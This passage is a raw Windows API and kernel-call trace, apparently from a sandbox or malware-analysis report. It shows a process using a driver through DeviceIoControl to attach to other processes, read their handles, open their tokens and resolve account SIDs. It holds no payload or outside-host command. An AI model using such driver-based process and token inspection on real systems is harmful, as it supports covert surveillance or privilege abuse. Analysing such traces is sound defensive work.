returned 0x364b20 [0225.819] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.819] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.819] PsAcquireProcessExitSynchronization () returned 0x0 [0225.819] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880052b35d0) [0225.819] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.819] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.819] PsReleaseProcessExitSynchronization () returned 0x2 [0225.819] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0225.820] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.820] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.820] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.820] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0xc8 [0225.820] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.820] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002034370, HandleInformation=0x0) returned 0x0 [0225.820] ObOpenObjectByPointer (in: Object=0xfffffa8002034370, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.820] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x14 [0225.820] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.820] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.820] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.820] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.820] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.822] CloseHandle (hObject=0xc4) returned 1 [0225.822] CloseHandle (hObject=0xc8) returned 1 [0225.822] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.822] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.822] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.823] PsAcquireProcessExitSynchronization () returned 0x0 [0225.823] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880052b35d0) [0225.823] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800203a8f0, HandleInformation=0x0) returned 0x0 [0225.823] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.823] PsReleaseProcessExitSynchronization () returned 0x2 [0225.823] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0225.823] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.823] ObfDereferenceObject (Object=0xfffffa800203a8f0) returned 0x1 [0225.823] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.823] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.823] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.823] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0225.823] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.823] PsAcquireProcessExitSynchronization () returned 0x0 [0225.824] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880052b35d0) [0225.824] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800203fc10, HandleInformation=0x0) returned 0x0 [0225.824] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.824] PsReleaseProcessExitSynchronization () returned 0x2 [0225.824] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0225.824] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.824] ObfDereferenceObject (Object=0xfffffa800203fc10) returned 0x1 [0225.824] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.824] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.824] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.824] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.824] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.824] PsAcquireProcessExitSynchronization () returned 0x0 [0225.824] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880052b35d0) [0225.824] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.824] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.824] PsReleaseProcessExitSynchronization () returned 0x2 [0225.825] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0225.825] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.825] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.825] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.825] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0xc8 [0225.825] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.825] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800203a060, HandleInformation=0x0) returned 0x0 [0225.825] ObOpenObjectByPointer (in: Object=0xfffffa800203a060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.825] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x14 [0225.825] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.825] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.825] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.825] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.825] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.827] CloseHandle (hObject=0xc4) returned 1 [0225.828] CloseHandle (hObject=0xc8) returned 1 [0225.828] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.828] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.828] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.828] PsAcquireProcessExitSynchronization () returned 0x0 [0225.828] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880052b35d0) [0225.828] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800203c3c0, HandleInformation=0x0) returned 0x0 [0225.828] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.828] PsReleaseProcessExitSynchronization () returned 0x2 [0225.828] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0225.828] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.828] ObfDereferenceObject (Object=0xfffffa800203c3c0) returned 0x1 [0225.828] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.829] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.829] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.829] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0225.829] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.829] PsAcquireProcessExitSynchronization () returned 0x0 [0225.829] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880052b35d0) [0225.829] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800203c270, HandleInformation=0x0) returned 0x0 [0225.829] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.829] PsReleaseProcessExitSynchronization () returned 0x2 [0225.829] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0225.829] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.829] ObfDereferenceObject (Object=0xfffffa800203c270) returned 0x1 [0225.829] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.829] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.830] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.830] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.830] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.830] PsAcquireProcessExitSynchronization () returned 0x0 [0225.830] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880052b35d0) [0225.830] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.830] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.830] PsReleaseProcessExitSynchronization () returned 0x2 [0225.830] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0225.830] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.830] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.830] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.830] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7c8) returned 0xc8 [0225.830] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.830] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002059b30, HandleInformation=0x0) returned 0x0 [0225.830] ObOpenObjectByPointer (in: Object=0xfffffa8002059b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.831] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x14 [0225.831] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.831] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.831] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.831] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.831] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.833] CloseHandle (hObject=0xc4) returned 1 [0225.833] CloseHandle (hObject=0xc8) returned 1 [0225.833] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.833] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.833] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.833] PsAcquireProcessExitSynchronization () returned 0x0 [0225.833] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880052b35d0) [0225.833] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002056690, HandleInformation=0x0) returned 0x0 [0225.834] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.834] PsReleaseProcessExitSynchronization () returned 0x2 [0225.834] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0225.834] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.834] ObfDereferenceObject (Object=0xfffffa8002056690) returned 0x1 [0225.834] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.834] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.834] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.834] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0225.834] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.834] PsAcquireProcessExitSynchronization () returned 0x0 [0225.834] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880052b35d0) [0225.834] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800205f070, HandleInformation=0x0) returned 0x0 [0225.834] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.834] PsReleaseProcessExitSynchronization () returned 0x2 [0225.834] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0225.834] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.834] ObfDereferenceObject (Object=0xfffffa800205f070) returned 0x1 [0225.834] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.834] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.834] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.834] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.834] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.835] PsAcquireProcessExitSynchronization () returned 0x0 [0225.835] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880052b35d0) [0225.835] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.835] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.835] PsReleaseProcessExitSynchronization () returned 0x2 [0225.835] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0225.835] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.835] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.835] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.835] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x788) returned 0xc8 [0225.835] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.835] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800205f1d0, HandleInformation=0x0) returned 0x0 [0225.835] ObOpenObjectByPointer (in: Object=0xfffffa800205f1d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.835] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x14 [0225.835] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.835] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.835] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.836] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.836] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.838] CloseHandle (hObject=0xc4) returned 1 [0225.838] CloseHandle (hObject=0xc8) returned 1 [0225.838] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.838] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.838] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff880052b3558 | out: 